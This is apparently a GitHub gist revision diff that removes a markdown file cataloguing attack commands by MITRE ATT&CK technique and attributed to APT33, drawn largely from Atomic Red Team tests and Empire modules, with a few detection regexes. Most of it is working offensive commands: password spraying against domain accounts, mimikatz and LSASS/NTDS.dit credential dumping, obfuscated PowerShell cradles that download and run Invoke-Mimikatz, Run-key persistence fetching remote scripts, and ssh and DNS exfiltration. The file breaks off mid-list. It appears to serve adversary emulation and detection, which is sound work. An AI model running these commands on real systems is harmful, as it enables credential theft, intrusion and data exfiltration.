

@MSAdministrator
Last active December 5, 2025 00:25
  • Save MSAdministrator/7a61025263e279a740835da4b205e6d0 to your computer and use it in GitHub Desktop.


Revisions

  1. MSAdministrator revised this gist Jan 8, 2020. No changes.
  2. MSAdministrator revised this gist Jan 8, 2020. 2 changed files with 10798 additions and 628 deletions.
    628 changes: 0 additions & 628 deletions apt33_apt34_possible_commands.md
    @@ -1,628 +0,0 @@
    # Actor: APT33
    ## Technique Name: Brute Force
    ## Technique Commands

    ```
    net user /domain > DomainUsers.txt
    echo "Password1" >> #{input_file_passwords}
    echo "1q2w3e4r" >> #{input_file_passwords}
    echo "Password!" >> #{input_file_passwords}
    @FOR /F %n in (DomainUsers.txt) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL
    net user /domain > DomainUsers.txt
    echo "Password1" >> #{input_file_passwords}
    echo "1q2w3e4r" >> #{input_file_passwords}
    echo "Password!" >> #{input_file_passwords}
    @FOR /F %n in (DomainUsers.txt) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:YOUR_COMPANY\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL
    net user /domain > #{input_file_users}
    echo "Password1" >> #{input_file_passwords}
    echo "1q2w3e4r" >> #{input_file_passwords}
    echo "Password!" >> #{input_file_passwords}
    @FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use \\COMPANYDC1\IPC$ /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\COMPANYDC1\IPC$ > NUL
    net user /domain > #{input_file_users}
    echo "Password1" >> passwords.txt
    echo "1q2w3e4r" >> passwords.txt
    echo "Password!" >> passwords.txt
    @FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (passwords.txt) DO @net use \\COMPANYDC1\IPC$ /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\COMPANYDC1\IPC$ > NUL
    powershell/recon/get_sql_server_login_default_pw
    powershell/recon/get_sql_server_login_default_pw
    powershell/recon/http_login
    powershell/recon/http_login
    powershell/situational_awareness/network/smbautobrute
    powershell/situational_awareness/network/smbautobrute
    powershell/situational_awareness/network/smbscanner
    powershell/situational_awareness/network/smbscanner
    Shell
    root @ icbc: / hacker / mima # hydra -l root -P passwd.txt ssh: //192.168.159.132 -V
    Hydra v9.0 (c) 2019 by van Hauser / THC - Please do not use in military or secret service organizations, or for illegal purposes.
    auth.log
    Log
    Failed password for root from 192.168.159.129 port 43728 ssh2
    audit.log
    Log
    type = USER_AUTH msg = audit (1572163129.581: 316): pid = 2165 uid = 0 auid = 4294967295 ses = 4294967295 msg = 'op = PAM: authentication acct = "root" exe = "/ usr / sbin / sshd" hostname = 192.168 .159.129 addr = 192.168.159.129 terminal = ssh res = failed '
    ```

    # Actor: APT33
    ## Technique Name: Commonly Used Port
    ## Technique Commands

    ```
    !=powershell.exe
    nslookup
    !=cmd.exe
    nslookup
    powershell/lateral_movement/invoke_sshcommand
    powershell/lateral_movement/invoke_sshcommand
    ```

    # Actor: APT33
    ## Technique Name: Credential Dumping
    ## Technique Commands

    ```
    hashdump
    mimikatz !lsadump::sam
    hashdump
    run hashdump
    run smart_hashdump
    post/windows/gather/credentials/domain_hashdump
    logonpasswords
    mimikatz !sekurlsa::logonpasswords
    mimikatz !sekurlsa::msv
    mimikatz !sekurlsa::kerberos
    mimikatz !sekurlsa::wdigest
    use mimikatz
    wdigest
    msv
    kerberos
    logonpasswords
    IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds
    gsecdump -a
    wce -o output.txt
    reg save HKLM\sam sam
    reg save HKLM\system system
    reg save HKLM\security security
    procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp
    ntdsutil "ac i ntds" "ifm" "create full C:\Atomic_Red_Team" q q
    vssadmin.exe create shadow /for=C:
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
    reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE
    reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE
    findstr /S cpassword %logonserver%\sysvol\*.xml
    . $PathToAtomicsFolder\T1003\src\Get-GPPPassword.ps1
    Get-GPPPassword -Verbose
    ntdsutil.exe
    \\Windows\\.+\\lsass.exeHKLM\SAM|HKLM\Security
    \\Windows\\.+\\bcryptprimitives.dll|\\Windows\\.+\\bcrypt.dll|\\Windows\\.+\\ncrypt.dll
    powershell/collection/ChromeDump
    powershell/collection/ChromeDump
    powershell/collection/FoxDump
    powershell/collection/FoxDump
    powershell/collection/ninjacopy
    powershell/collection/ninjacopy
    powershell/collection/vaults/add_keepass_config_trigger
    powershell/collection/vaults/add_keepass_config_trigger
    powershell/collection/vaults/find_keepass_config
    powershell/collection/vaults/find_keepass_config
    powershell/collection/vaults/get_keepass_config_trigger
    powershell/collection/vaults/get_keepass_config_trigger
    powershell/collection/vaults/keethief
    powershell/collection/vaults/keethief
    powershell/collection/vaults/remove_keepass_config_trigger
    powershell/collection/vaults/remove_keepass_config_trigger
    powershell/credentials/enum_cred_store
    powershell/credentials/enum_cred_store
    powershell/credentials/mimikatz/cache
    powershell/credentials/mimikatz/cache
    powershell/credentials/mimikatz/command
    powershell/credentials/mimikatz/command
    powershell/credentials/mimikatz/dcsync
    powershell/credentials/mimikatz/dcsync
    powershell/credentials/mimikatz/dcsync_hashdump
    powershell/credentials/mimikatz/dcsync_hashdump
    powershell/credentials/mimikatz/extract_tickets
    powershell/credentials/mimikatz/extract_tickets
    powershell/credentials/mimikatz/golden_ticket
    powershell/credentials/mimikatz/golden_ticket
    powershell/credentials/mimikatz/logonpasswords
    powershell/credentials/mimikatz/logonpasswords
    powershell/credentials/mimikatz/lsadump
    powershell/credentials/mimikatz/lsadump
    powershell/credentials/mimikatz/mimitokens
    powershell/credentials/mimikatz/mimitokens
    powershell/credentials/mimikatz/sam
    powershell/credentials/mimikatz/sam
    powershell/credentials/mimikatz/silver_ticket
    powershell/credentials/mimikatz/silver_ticket
    powershell/credentials/mimikatz/trust_keys
    powershell/credentials/mimikatz/trust_keys
    powershell/credentials/powerdump
    powershell/credentials/powerdump
    powershell/credentials/vault_credential
    powershell/credentials/vault_credential
    powershell/management/downgrade_account
    powershell/management/downgrade_account
    powershell/management/wdigest_downgrade
    powershell/management/wdigest_downgrade
    powershell/privesc/gpp
    powershell/privesc/gpp
    powershell/privesc/mcafee_sitelist
    powershell/privesc/mcafee_sitelist
    python/collection/linux/hashdump
    python/collection/linux/hashdump
    python/collection/linux/mimipenguin
    python/collection/linux/mimipenguin
    python/collection/osx/hashdump
    python/collection/osx/hashdump
    python/collection/osx/kerberosdump
    python/collection/osx/kerberosdump
    python/management/multi/kerberos_inject
    python/management/multi/kerberos_inject
    python/situational_awareness/network/dcos/etcd_crawler
    python/situational_awareness/network/dcos/etcd_crawler
    ```

    # Actor: APT33
    ## Technique Name: Data Compressed
    ## Technique Commands

    ```
    dir #{input_file} -Recurse | Compress-Archive -DestinationPath $env:USERPROFILE\data.zip
    dir $env:USERPROFILE -Recurse | Compress-Archive -DestinationPath $env:USERPROFILE\data.zip
    rar a -r #{output_file} #{input_path} *.txt
    rar a -r %USERPROFILE%\data.rar #{input_path} *.txt
    rar a -r #{output_file} %USERPROFILE% *#{file_extension}
    zip $HOME/data.zip #{input_files}
    zip $HOME/data.zip $HOME/*.txt
    test -e $HOME/victim-gzip.txt && gzip -k $HOME/victim-gzip.txt || (echo '#{input_content}' >> $HOME/victim-gzip.txt; gzip -k $HOME/victim-gzip.txt)
    test -e $HOME/victim-gzip.txt && gzip -k $HOME/victim-gzip.txt || (echo 'confidential! SSN: 078-05-1120 - CCN: 4000 1234 5678 9101' >> $HOME/victim-gzip.txt; gzip -k $HOME/victim-gzip.txt)
    tar -cvzf $HOME/data.tar.gz #{input_file_folder}
    tar -cvzf $HOME/data.tar.gz $HOME/$USERNAME
    rar.exe
    powershell/management/zipfolder
    powershell/management/zipfolder
    ```

    # Actor: APT33
    ## Technique Name: Data Encoding
    ## Technique Commands

    ```
    echo -n 111-11-1111 | base64
    curl -XPOST MTExLTExLTExMTE=.#{destination_url}
    echo -n 111-11-1111 | base64
    curl -XPOST MTExLTExLTExMTE=.redcanary.com
    ```

    # Actor: APT33
    ## Technique Name: Exfiltration Over Alternative Protocol
    ## Technique Commands

    ```
    ssh target.example.com "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
    ssh target.example.com "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
    ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
    tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@target.example.com 'cat > /Users.tar.gz.enc'
    tar czpf - /Users/* | openssl des3 -salt -pass atomic | ssh #{user_name}@target.example.com 'cat > /Users.tar.gz.enc'
    tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh atomic@#{domain} 'cat > /Users.tar.gz.enc'
    $ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("127.0.0.1", 1500, $Data) }
    $ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path C:\Windows\System32\notepad.exe -Encoding Byte -ReadCount 1024) { $ping.Send("127.0.0.1", 1500, $Data) }
    powershell/exfiltration/exfil_dropbox
    powershell/exfiltration/exfil_dropbox
    exfiltration/Invoke_ExfilDataToGitHub
    exfiltration/Invoke_ExfilDataToGitHub
    ```

    # Actor: APT33
    ## Technique Name: Exploitation for Privilege Escalation
    ## Technique Commands

    ```
    getsystem
    getsystem
    bitsadmin.exe
    msbuild.exe *MSBuildShell.csproj
    powershell/privesc/ms16-032
    powershell/privesc/ms16-032
    powershell/privesc/tater
    powershell/privesc/tater
    powershell/privesc/ms16-135
    powershell/privesc/ms16-135
    ```

    # Actor: APT33
    ## Technique Name: Network Sniffing
    ## Technique Commands

    ```
    tcpdump -c 5 -nnni ens33
    tshark -c 5 -i ens33
    tcpdump -c 5 -nnni en0A
    tshark -c 5 -i en0A
    "c:\Program Files\Wireshark\tshark.exe" -i Ethernet0 -c 5
    c:\windump.exe
    & "c:\Program Files\Wireshark\tshark.exe" -i Ethernet0 -c 5
    & c:\windump.exe
    powershell/collection/packet_capture
    powershell/collection/packet_capture
    python/collection/linux/sniffer
    python/collection/linux/sniffer
    python/collection/osx/sniffer
    python/collection/osx/sniffer
    ```

    # Actor: APT33
    ## Technique Name: Obfuscated Files or Information
    ## Technique Commands

    ```
    sh -c "echo ZWNobyBIZWxsbyBmcm9tIHRoZSBBdG9taWMgUmVkIFRlYW0= > /tmp/encoded.dat"
    cat /tmp/encoded.dat | base64 -d > /tmp/art.sh
    chmod +x /tmp/art.sh
    /tmp/art.sh
    $OriginalCommand = 'Write-Host "Hey, Atomic!"'
    $Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
    $EncodedCommand =[Convert]::ToBase64String($Bytes)
    $EncodedCommand
    powershell.exe -EncodedCommand $EncodedCommand
    $OriginalCommand = '#{powershell_command}'
    $Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
    $EncodedCommand =[Convert]::ToBase64String($Bytes)
    $EncodedCommand
    Set-ItemProperty -Force -Path #{registry_key_storage} -Name Debug -Value $EncodedCommand
    powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} Debug).Debug)))"
    $OriginalCommand = 'Write-Host "Hey, Atomic!"'
    $Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
    $EncodedCommand =[Convert]::ToBase64String($Bytes)
    $EncodedCommand
    Set-ItemProperty -Force -Path #{registry_key_storage} -Name Debug -Value $EncodedCommand
    powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} Debug).Debug)))"
    $OriginalCommand = '#{powershell_command}'
    $Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
    $EncodedCommand =[Convert]::ToBase64String($Bytes)
    $EncodedCommand
    Set-ItemProperty -Force -Path HKCU:Software\Microsoft\Windows\CurrentVersion -Name #{registry_entry_storage} -Value $EncodedCommand
    powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:Software\Microsoft\Windows\CurrentVersion #{registry_entry_storage}).#{registry_entry_storage})))"
    [a-z0-9]{1}.exe
    *.exe \*.exe\:Zone.Identifier:$DATA"
    ```

    # Actor: APT33
    ## Technique Name: PowerShell
    ## Technique Commands

    ```
    powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
    powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1'); Invoke-BloodHound"
    (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))
    (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs()
    Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))
    $url='https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
    Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/master/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
    New-LocalUser -FullName '#{full_name}' -Name '#{user_name}' -Password ATOM1CR3DT3@M -Description '#{description}'
    New-LocalUser -FullName '#{full_name}' -Name 'atomic_user' -Password ATOM1CR3DT3@M -Description '#{description}'
    New-LocalUser -FullName '#{full_name}' -Name '#{user_name}' -Password #{password} -Description 'Atomic Things'
    New-LocalUser -FullName 'Atomic Red Team' -Name '#{user_name}' -Password #{password} -Description 'Atomic Things'
    powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
    powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml');$Xml.command.a.execute | IEX"
    "C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/mshta.sct').Exec();close()"
    # Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
    reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI="
    iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
    powershell.exe -version 2 -Command Write-Host $PSVersion
    Add-Content -Path $env:TEMP\NTFS_ADS.txt -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
    $streamcommand = Get-Content -Path $env:TEMP\NTFS_ADS.txt -Stream 'streamcommand'
    Invoke-Expression $streamcommand
    excel.exe
    cmd.exe
    powershell.exe
    excel.exe
    powershell.exe
    mshta.exe
    cmd.exe
    powershell.exe
    mshta.exe
    powershell.exe
    powerpoint.exe
    cmd.exe
    powershell.exe
    powerpoint.exe
    powershell.exe
    powershell.exe webClient.DownloadString(
    powershell.exe webClient.DownloadFile
    powershell.exe webClient.DownloadData
    winword.exe
    powershell.exe
    hidden|-enc|-NonI\\Windows\\.+\\WindowsPowerShell\\.+\\powershell.exe
    powershell/lateral_movement/invoke_psremoting
    powershell/lateral_movement/invoke_psremoting
    powershell/management/spawn
    powershell/management/spawn
    python/management/multi/spawn
    python/management/multi/spawn
    ```

    # Actor: APT33
    ## Technique Name: Registry Run Keys / Startup Folder
    ## Technique Commands

    ```
    REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "C:\Path\AtomicRedTeam.exe"
    REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\Path\AtomicRedTeam.dll"
    $RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
    set-itemproperty $RunOnceKey "NextRun" 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
    Software\Microsoft\Windows\CurrentVersion\Run|Software\Microsoft\Windows\CurrentVersion\RunOnce|Software\Microsoft\Windows\CurrentVersion\RunOnceEx|Software\Microsoft\Windows\CurrentVersion\RunServicesOnce|Software\Microsoft\Windows\CurrentVersion\RunServices|SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad|Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run|Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders|Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
    \Microsoft\Windows\Start Menu\Programs\Startup|Software\Microsoft\Windows\CurrentVersion\Run|Software\Microsoft\Windows\CurrentVersion\RunOnce|Software\Microsoft\Windows\CurrentVersion\RunOnceEx|Software\Microsoft\Windows\CurrentVersion\RunServicesOnce|Software\Microsoft\Windows\CurrentVersion\RunServices|SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad|Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run|Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders|Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Microsoft\Windows\Start Menu\Programs\Startup
    \Microsoft\Windows\Start Menu\Programs\Startup\Microsoft\Windows\Start Menu\Programs\Startup
    powershell/persistence/elevated/registry
    powershell/persistence/elevated/registry
    powershell/persistence/userland/registry
    powershell/persistence/userland/registry
    ```

    # Actor: APT33
    ## Technique Name: Remote File Copy
    ## Technique Commands

    ```
    rsync -r #{local_path} victim@#{remote_host}:#{remote_path}
    rsync -r /tmp/adversary-rsync/ victim@#{remote_host}:#{remote_path}
    rsync -r #{local_path} #{username}@victim-host:#{remote_path}
    rsync -r #{local_path} #{username}@victim-host:/tmp/victim-files
    rsync -r adversary@#{remote_host}:#{remote_path} #{local_path}
    rsync -r adversary@#{remote_host}:#{remote_path} /tmp/victim-files
    rsync -r #{username}@adversary-host:#{remote_path} #{local_path}
    rsync -r #{username}@adversary-host:/tmp/adversary-rsync/ #{local_path}
    scp #{local_file} victim@#{remote_host}:#{remote_path}
    scp /tmp/adversary-scp victim@#{remote_host}:#{remote_path}
    scp #{local_file} #{username}@victim-host:#{remote_path}
    scp #{local_file} #{username}@victim-host:/tmp/victim-files/
    scp adversary@#{remote_host}:#{remote_file} #{local_path}
    scp adversary@#{remote_host}:/tmp/adversary-scp #{local_path}
    scp #{username}@#{remote_host}:#{remote_file} /tmp/victim-files/
    scp #{username}@adversary-host:#{remote_file} /tmp/victim-files/
    sftp victim@#{remote_host}:#{remote_path} <<< $'put #{local_file}'
    sftp victim@#{remote_host}:#{remote_path} <<< $'put /tmp/adversary-sftp'
    sftp #{username}@victim-host:#{remote_path} <<< $'put #{local_file}'
    sftp #{username}@victim-host:/tmp/victim-files/ <<< $'put #{local_file}'
    sftp adversary@#{remote_host}:#{remote_file} #{local_path}
    sftp adversary@#{remote_host}:/tmp/adversary-sftp #{local_path}
    sftp #{username}@#{remote_host}:#{remote_file} /tmp/victim-files/
    sftp #{username}@adversary-host:#{remote_file} /tmp/victim-files/
    cmd /c certutil -urlcache -split -f #{remote_file} Atomic-license.txt
    cmd /c certutil -urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt Atomic-license.txt
    $datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)"
    New-Item -Path $datePath -ItemType Directory
    Set-Location $datePath
    certutil -verifyctl -split -f #{remote_file}
    Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination Atomic-license.txt }
    $datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)"
    New-Item -Path $datePath -ItemType Directory
    Set-Location $datePath
    certutil -verifyctl -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
    Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination Atomic-license.txt }
    C:\Windows\System32\bitsadmin.exe /transfer qcxjb7 /Priority HIGH #{remote_file} #{local_path}
    C:\Windows\System32\bitsadmin.exe /transfer qcxjb7 /Priority HIGH #{remote_file} Atomic-license.txt
    C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt #{local_path}
    (New-Object System.Net.WebClient).DownloadFile("#{remote_file}", "Atomic-license.txt")
    (New-Object System.Net.WebClient).DownloadFile("https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt", "Atomic-license.txt")
    ```

    # Actor: APT33
    ## Technique Name: Scheduled Task
    ## Technique Commands

    ```
    schtasks [/s HOSTNAME]
    shell schtasks
    Creating a scheduled task:
    schtasks [/S HOSTNAME] /create /tn "acachesrv" /tr C:\file\path\here.exe /sc ONLOGON /ru "System" [/rp password]
    Requirements for running scheduled tasks:
    net start schedule
    sc config schedule start= auto
    Creating a scheduled task:
    shell schtasks [/S HOSTNAME] /create /tn "acachesrv" /tr C:\file\path\here.exe /sc ONLOGON /ru "System" [/rp password]
    Requirements for running scheduled tasks:
    shell net start schedule
    shell sc config schedule start= auto
    at 13:20 /interactive cmd
    SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST #{time}
    SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "C:\windows\system32\cmd.exe" /SC daily /ST #{time}
    SCHTASKS /Create /S #{target} /RU #{user_name} /RP At0micStrong /TN "Atomic task" /TR "C:\windows\system32\cmd.exe" /SC daily /ST #{time}
    SCHTASKS /Create /S #{target} /RU DOMAIN\user /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
    SCHTASKS /Create /S localhost /RU DOMAIN\user /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
    $Action = New-ScheduledTaskAction -Execute "calc.exe"
    $Trigger = New-ScheduledTaskTrigger -AtLogon
    $User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
    $Set = New-ScheduledTaskSettingsSet
    $object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
    Register-ScheduledTask AtomicTask -InputObject $object
    schtask.exe /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10
    schtask.exe /create /tn "mysc" /tr C:\windows\system32\cmd.exe /sc ONLOGON /ru "System"
    at.exe ##:## /interactive cmd
    at.exe \\[computername|IP] ##:## c:\temp\evil.bat
    net.exe use \\[computername|IP] /user:DOMAIN\username password
    net.exe time \\[computername|IP]
    schtasks.exe /create * appdata
    \\Windows\\.+\\at.exe
    /Create\\Windows\\.+\\schtasks.exe
    powershell/lateral_movement/new_gpo_immediate_task
    powershell/lateral_movement/new_gpo_immediate_task
    powershell/persistence/elevated/schtasks
    powershell/persistence/elevated/schtasks
    powershell/persistence/userland/schtasks
    powershell/persistence/userland/schtasks
    ```

    # Actor: APT33
    ## Technique Name: Standard Application Layer Protocol
    ## Technique Commands

    ```
    Invoke-WebRequest www.google.com -UserAgent "HttpBrowser/1.0" | out-null
    Invoke-WebRequest www.google.com -UserAgent "Wget/1.9+cvs-stable (Red Hat modified)" | out-null
    Invoke-WebRequest www.google.com -UserAgent "Opera/8.81 (Windows NT 6.0; U; en)" | out-null
    Invoke-WebRequest www.google.com -UserAgent "*<|>*" | out-null
    curl -s -A "HttpBrowser/1.0" -m3 www.google.com
    curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 www.google.com
    curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 www.google.com
    curl -s -A "*<|>*" -m3 www.google.com
    curl -s -A "HttpBrowser/1.0" -m3 www.google.com
    curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 www.google.com
    curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 www.google.com
    curl -s -A "*<|>*" -m3 www.google.com
    for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "TXT" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}" -QuickTimeout}
    for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "TXT" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).example.com" -QuickTimeout}
    for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "#{query_type}" "atomicredteam.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}" -QuickTimeout}
    Set-Location $PathToAtomicsFolder
    .\T1071\src\T1071-dns-beacon.ps1 -Domain example.com -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}
    Set-Location $PathToAtomicsFolder
